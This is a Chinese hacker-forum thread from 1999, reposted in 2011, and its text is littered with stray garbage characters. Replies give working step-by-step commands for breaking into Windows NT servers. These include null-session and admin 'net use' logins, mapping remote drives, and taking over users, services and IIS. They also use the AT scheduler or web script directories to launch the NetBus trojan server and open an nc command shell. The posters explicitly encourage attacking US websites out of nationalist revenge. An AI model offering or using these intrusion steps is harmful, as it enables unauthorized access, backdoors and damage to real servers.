《版主頁黑客工具和文章的幾個問題》中提到:
' O* }# J( H% ?! P6 Q4 q4 A請教,從版主頁上載得PINGER��,GRINDER��,LETMEIN等��,卻不能用���,PINGER安裝后�����,明明安裝前文件有1M多�����,但安裝完后生成的文件夾中只有PINGER�。EXE����,40多K����,運行PINGER�����,設(shè)置好IP�,點PING,彈出一個窗口(C++�。。�����。)�,說出錯,然后關(guān)閉了����,何故,是不是安裝有誤�? 2�����。運行LETMEIN,彈出以下錯誤:連接文件LETMEIN���。EXE到不存在的NETAPI32��。DLL����;NETGROUPGETUSERS�����。 是否說明需要NETAPI32����。DLL文件,哪里有該DLL���。 3�����。USAKILLER 的教學(xué)文章中提到需在WINNT4���。0下運行以下步驟等�,是否要求我的操作系統(tǒng)也是WINNT4��。0 �����,應(yīng)該不是吧�����? 4���。NC FOR NT 是否要求我的操作系統(tǒng)為NT�,還是服務(wù)器的操作系統(tǒng)為NT��? 太多的問題需高手回答��,我花那么多的時間和金錢下載這幾M文件卻不能用���,實在窩囊哦�����, 強烈建議USAKILLER 等高手級的黑客寫更多的教學(xué)文章�,以提高我國黑客水平����。
+ A9 n' g G D% f6 P> 我的機子MMX166,WIN98����,2。5G��,32M內(nèi)存��。
4 E& J' s6 T \* A/ R( Z
8 V- ?. U7 Z0 S黑客并不神秘����,你只要了解操作系統(tǒng),學(xué)習(xí)一些操作系統(tǒng)的弱點��,輔助相關(guān)的工具��,就可以成功��。
; y% N0 o5 j' J# `6 O) q你的問題是��,pinger, grinder, letmein等工具必須要在NT上運行,我們強烈建議���,你一定要安裝NT�,對于你的機器配制�,和我們現(xiàn)在差不多,只是比你多了32M內(nèi)存���,2G硬盤��。: _4 n2 S, d. j! T h! d2 t
其實�����,攻擊敵站��,利用其操作系統(tǒng)本身的工具就可以了���,比如,我們在NT上攻擊某服務(wù)器����,該服務(wù)器為NT4.0,我們將做如下簡單事情就有可能成功����,假設(shè)目標(biāo)NT的IP地址為111.111.111.111�����,做法如下:
$ h* I9 A3 O0 i2 D+ h% M' [5 Ynet use \\111.111.111.111\ipc$ "" /user:""
, x0 Q# t" f1 p' M9 h* G* Rnet.exe是NT的工具文件,該命令將和目標(biāo)服務(wù)器建立Null Session��,如果成功����,你可以查看該服務(wù)器上的共享目錄:
4 d6 e: S: _3 L3 Gnet view \\111.111.111.111
' y; y! n6 U( ^3 t當(dāng)然,如果你有該NT管理員密碼����,就更好辦了,假設(shè)其管理員Admin密碼為fuck:
3 |0 H. ]* {) @+ C/ snet use \\111.111.111.111\ipc$ "fuck" /user:"Admin"
& Z4 V9 C* N4 a q$ n& r命令成功后���,幾乎所有目標(biāo)NT上的配制�����,資源�����,你都可以在你本地NT上連接遠(yuǎn)程計算機來查看或修改: v+ F% T* S( n% \8 }% T) r1 v8 s* D+ a
1�、查看或修改遠(yuǎn)程機器上的硬盤,假如目標(biāo)NT上有C���、D兩個硬盤:" e) N ]& K) H9 E1 X& {5 g
net use x: \\111.111.111.111\c$
- P5 w/ K \- znet use y: \\111.111.111.111\d$- {* Y) ^4 p, ~: _ |) C0 I
這樣����,目標(biāo)NT上的C��、D盤分別被影射為你本地的X��、Y盤����,你想怎么做都可以...
6 ]7 J6 t$ r- y1 [4 ^$ }2、管理目標(biāo)NT的用戶:( q% P- \4 _' [# Y( F. S
從“開始”->“程序”->“管理工具(公用)”->“域用戶管理器”->菜單:“用戶”->“選擇域”' `, d( i0 a% ^
鍵入\\111.111.111.111后���,目標(biāo)NT上的所有用戶你想怎么做都可以�,和管理你本地的一樣
0 s4 X7 P/ T& R7 v6 y* t b3�����、管理目標(biāo)NT的服務(wù)1 S: |. l6 ?( Z7 R
選擇“管理工具(公用)”->“服務(wù)器管理”->“計算機”->“選擇域”% l. P3 E, f, b! A
這樣你可以管理目標(biāo)NT上的服務(wù)���,共享目錄
# C. J3 p; R, k7 a6 x0 m3 U4����、IIS管理
/ E1 P" I/ Y- W( Q& R, g選擇“Microsoft Internet Service管理”->“Internet 服務(wù)管理器”->"連接到服務(wù)器"->111.111.111.111
5 P) c% U9 `$ X; i目標(biāo)NT的FTP、WWW服務(wù)你就可以重新配置3 {. \" y( y: K) V, p6 y; U
5����、事件管理
7 y; [1 @& O I7 W) {6 j4 m“事件查看器”->連接到服務(wù)器->111.111.111.111
7 [5 a2 K$ m4 T/ a) l ^0 c0 W0 C7 y; v* I
還有更多的東西,都可以用NT本身的功能來完成�����,這些都是95, 98所不能實現(xiàn)的����。
" G1 t# Y9 x0 a$ z: j; c; N
, B7 V) F5 `# H: a當(dāng)然��,98,95也能做一些事情�����,但很麻煩���,比如:7 c8 h ^: u$ M5 @
net use \\111.111.111.111\ipc$- c0 i; ] K4 z! g* n) C) a
net use z: \\111.111.111.111\d$3 f$ i; H& w4 `8 i2 w0 y0 M0 g- H, y' l
但其后不能帶參數(shù)�����,即改用其他用戶或密碼��,系統(tǒng)將用當(dāng)前用戶和密碼去登錄���,如果你知道目標(biāo)NT的用戶或密碼�����,重新啟動95, 98����,改用該用戶和密碼登錄���,方可實現(xiàn)����,你可以連接目標(biāo)NT上的共享資源���,但不能進(jìn)行管理�,如用戶、事件等
3 j1 Q- f8 ~8 m! e+ }: ?0 C" u
% X+ R } P( S6 s4 ^3 T; |1 P9 g( h我們強烈建議各位有心要為死難者報仇���,真正的想黑霉國的站點���,花點時間,裝個NT吧����,NT Workstation也可以!' e* ?5 K, x/ p9 M6 C+ X, _. ^
這樣����,你還可以了解目標(biāo)機器上能有什么東東供你去用!
5 ~! M6 f+ M- Q' [1 q" ]
+ `7 T5 Q" s# d! v- Y! z( [/ C8 R$ a' @# L
--------------------------------------------------------------------------------
% ^' a& d! d: J" d# x b$ v7 ~( g( E6 c% ?! U
>quack于1999-06-12�����,23:37:44
- H1 r5 S0 i6 z% d9 J! F B在大作《幾個有關(guān)黑的問題》中提到:- s( G+ z2 r. ~& R$ ]# }. [9 p# B+ [
首先向各位黑兄們致敬,我下了你們的傳的東東,但發(fā)現(xiàn)在用LETMEIN.EXE的時候沒有用到MYPWD的參數(shù),鍵入LETMEIN查詢其使用方法時亦無此參數(shù)項,不知為是何原因?另,用PINGER查詢到的IP地址若無機器名的是否可以直接進(jìn)入,我怎么用NET USE總無法登陸?再有,假定我上傳了CIH,對了,CIH對NT暫時無效,假定上傳其它"有益"美國NT主機的東東上去,而未傳NETBUS,可否直接在其機了運行此東東使其當(dāng)堂暴斃?--我曾用LEGION上美國機子,但運行程序時卻是在我的機上干活,差點把自己斃了!再有,我在微軟的CHAT中常遇到美國鬼子,在其CHAT下怎樣才能看到它的IP?怎樣把它們給KILL了?--順便說一句,我還真干掉了幾個美國人,哈!���。
8 G+ B8 L3 w B2 s2 k, N
& [0 t6 Y8 z# ? Jkillusa于1999-06-13,03:25:158 ~7 E2 h( j' g: i/ }
在大作《Re: 幾個有關(guān)黑的問題》中提到:7 b5 T6 S' \, y& X- R" B! L, E8 Y
0 Y/ J* `0 _3 B* ~: X+ Cletmein.exe 暫時沒有mypwd參數(shù)��,十分抱歉4 t0 q0 G. t+ |; W% |
pinger程序���,只是利用ping來尋找主機�,每臺NT服務(wù)器有一個主IP地址,但也可以設(shè)置多個輔助IP地址�����,比如有些服務(wù)器供應(yīng)商��,一臺NT服務(wù)器上可以設(shè)置一千多個IP���,每個IP對應(yīng)一個Hostname,而真正能找到主機名的只有一個IP地址����,就是該主機的主IP地址���,所以有時顯示只有IP�,而無主機名��。另外��,有些服務(wù)器是非NT的操作系統(tǒng)��,有時將不會顯示主機名�。當(dāng)然��,有時在服務(wù)器上進(jìn)行一些設(shè)置����,也會出現(xiàn)上面的情況���。
0 P# J3 w) r, k
5 K0 M- Y. `0 b! D. X5 Y8 ?Netbus分客戶端程序ntsrv.exe和服務(wù)器端netbus.exe兩個程序����,所以���,netbus.exe是不用上傳的��,只需在目的2 m- U9 N$ l. t5 q+ K6 j
服務(wù)器上運行ntsrv.exe���,而在目的服務(wù)器運行該程序有很多種方法:
6 v. ^# z0 @" ~: C, w8 t `# Y; k- R; E* }9 M1 Q# B. i
1、利用服務(wù)器的 Schedule 服務(wù)來啟動schedule 服務(wù)是指在服務(wù)器上定時運行某程序���,具體使用方法,可在自己的NT Dos窗口下鍵入以下:8 p) o7 I. C- t1 i" n. F6 m' r) q
& M+ |+ P$ \: b* |4 K! [8 L. j
C:\>net start schedule# c" I# Q) a' z4 T( t
Schedule 正在啟動服務(wù).....
7 j& x6 H" D, j* O8 E# S& oSchedulw 服務(wù)啟動成功���。
- P6 ~8 }, t) W `C:\>at /?, J, R& v- |3 D. ^. R
AT 命令排定在特定的日期和時間運行某些命令和程序���。
( q* j0 _. J* r, g; }+ B運行 AT 命令之前必須先啟動 Schedule 服務(wù)���。
- ?& C, a1 g5 S! D
9 }4 n6 z$ R$ }; ?4 B. H7 }9 CAT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]: [$ u6 h- Z4 r3 R, |
AT [\\computername] time [/INTERACTIVE]" G8 r+ l5 z2 I' r
[ /EVERY:date[,...] | /NEXT:date[,...]] "command"
L" R* a6 }( ]" w7 w5 t7 y4 N4 X3 ]8 P" ?) n
\\computername 指定遠(yuǎn)程計算機。 如果省略這個參數(shù)
+ G" K: C9 [3 v# M% i- I5 i命令會被排定在本機上運行��。
7 s% [& ~+ d, \- did 指定給排定進(jìn)度命令的識別號����。
6 I6 y% d& x! ]/ i7 i% w; ]7 H. M9 o2 | T; `/ g$ g2 @
/delete 刪除某個已排定進(jìn)度的命令。如果省略標(biāo)識����,計算機上所有已排定進(jìn)度的命令都會被刪除。
6 n r. p- B5 @* m* q3 i/yes 用于刪除所有作業(yè)���,且不想在運行刪除時顯示確認(rèn)信息 ����。
: ^2 u3 g) G/ [! c& ~: Mtime 指定命令運行的時間��。
+ [6 T3 a9 c1 e- F/interactive 允許作業(yè)在運行時��,與用戶通過桌面交互�。
9 r& O/ z! W$ M( g- }: @: ?1 u
: k1 o* Z" D8 Y9 d+ ]+ i3 v/every:date[,...] 指定在每周或每月的某日 (或某幾日) 運行命令�����。8 f# A! C8 ~/ Q$ v4 C k
如果省略日期����,則默認(rèn)為在每月的本日運行�����。
, @3 R: s: o9 O0 G! d1 P* Y" @
# C6 D3 ~* I% `5 m# n/next:date[,...] 指定在下一個指定日期 (如�,下周三),運行命令�����。如果省略日期��,則默認(rèn)為在每月的本日運行�。: ^' C \ V' m0 G
' \, @& [' l& U# Q9 ]. Y
"command" 準(zhǔn)備運行的 Windows NT 命令或批處理文件。4 x* U4 Z. ~% }, p$ W9 Q6 m
1 W& v9 L0 P }% ^C:\>
5 ?# E% L, r2 a p$ Z' S8 ]" d4 S+ L% y! y3 C5 J: q
知道了如何使用AT��,再來看看如何在遠(yuǎn)程NT上運行ntsrv.exe:7 g) [" O8 P$ U+ V2 f2 n
1 利用管理員登陸到目的服務(wù)器���,方法為: net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"( }/ \2 o8 I5 U
2 利用ntsrv.exe啟動遠(yuǎn)程: netsvc \\x.x.x.x schedule /start
P/ ^ w0 [& ~2 z# E3 利用AT.EXE在遠(yuǎn)程服務(wù)器設(shè)置程序定時運行��,當(dāng)然最快運行最理想�,所以�����,你可以用letmein.exe得到服務(wù)器的時間�,然后:0 X; n7 z7 ]- K7 u
at \\x.x.x.x 00:00 ntsrv.exe /port:64321! [5 [, ?) T) _$ s# U
其中00:00要改為用letmein.exe得回來的具體時間+一點容量,等一會后�����,再在本地啟動netbus.exe�����,鍵入目的服務(wù)器得ip地址或hostname�,連接!具體使用可參照 "How to get in nt"�����,比如第一種方法�����,你想要在目的服務(wù)器運行 LEGION,可以利用netbus得上傳功能��,將LEGION上傳至目的服務(wù)器�����,再用netbus的"Start program"���,鍵入完整路徑的LEGION運行程序����,就ok了�����!第二種方法是利用netbus的“App redirect”功能��,啟動遠(yuǎn)程telnet服務(wù)���,如下:在netbus中擊“App redirect”����,鍵入"C:\>winnt\system32\cmd.exe",Port為:4321�����,服務(wù)就啟動了��,然后在本地運行:nc x.x.x.x 4321���,出現(xiàn)dos啟動的畫面就表示連接成功:9 V% _1 P5 c( A- \5 D$ P, z
Microsoft(R) Windows NT(TM)
1 W( z& H0 [$ o6 f6 T3 T(C) Copyright 1985-1996 Microsoft Corp.: s* y/ ^: m" E# Y$ O+ _4 W
C:\>* w4 w- O) b- B% o7 `' `# z
3 p0 b) s/ z* v/ o+ u2 `/ }- s, V
2、利用web啟動ntsrv.exe或其他程序在目的服務(wù)器8 K. O) j6 w% O, h$ w
2 B+ C; W5 I5 v
將ntsrv.exe 或其他運行程序Copy到目的服務(wù)器的www可執(zhí)行目錄�����,如cgi-bin或scripts���,然后在瀏覽器鍵入url如:
! ^. w' j) v2 [http://x.x.x.x/scripts/ntsrv.exe /port:64321
( R A# o. {% {8 v3 l0 t3 b r或 http://x.x.x.x/cgi-gin/ntsrv.exe /port:64321
( @' p, u0 L1 l5 o; c" [/ B該程序就啟動了
' L0 S) d$ X* d) T$ A" ?+ e& ~' e+ o4 N+ {0 S$ ^0 F2 z \
我只提這幾中方法����!
z3 X+ j" M3 }1 u5 K3 ~要成功����,必須打好基礎(chǔ)工,對操作系統(tǒng)充分了解!; j8 |# m. L1 s9 G1 M
, O8 D( c$ d9 i) a% A; F' G; W
|
發(fā)表于 2011-1-13 17:03:28
QQ好友和群
QQ空間
提升卡
置頂卡
沉默卡
喧囂卡
變色卡
顯身卡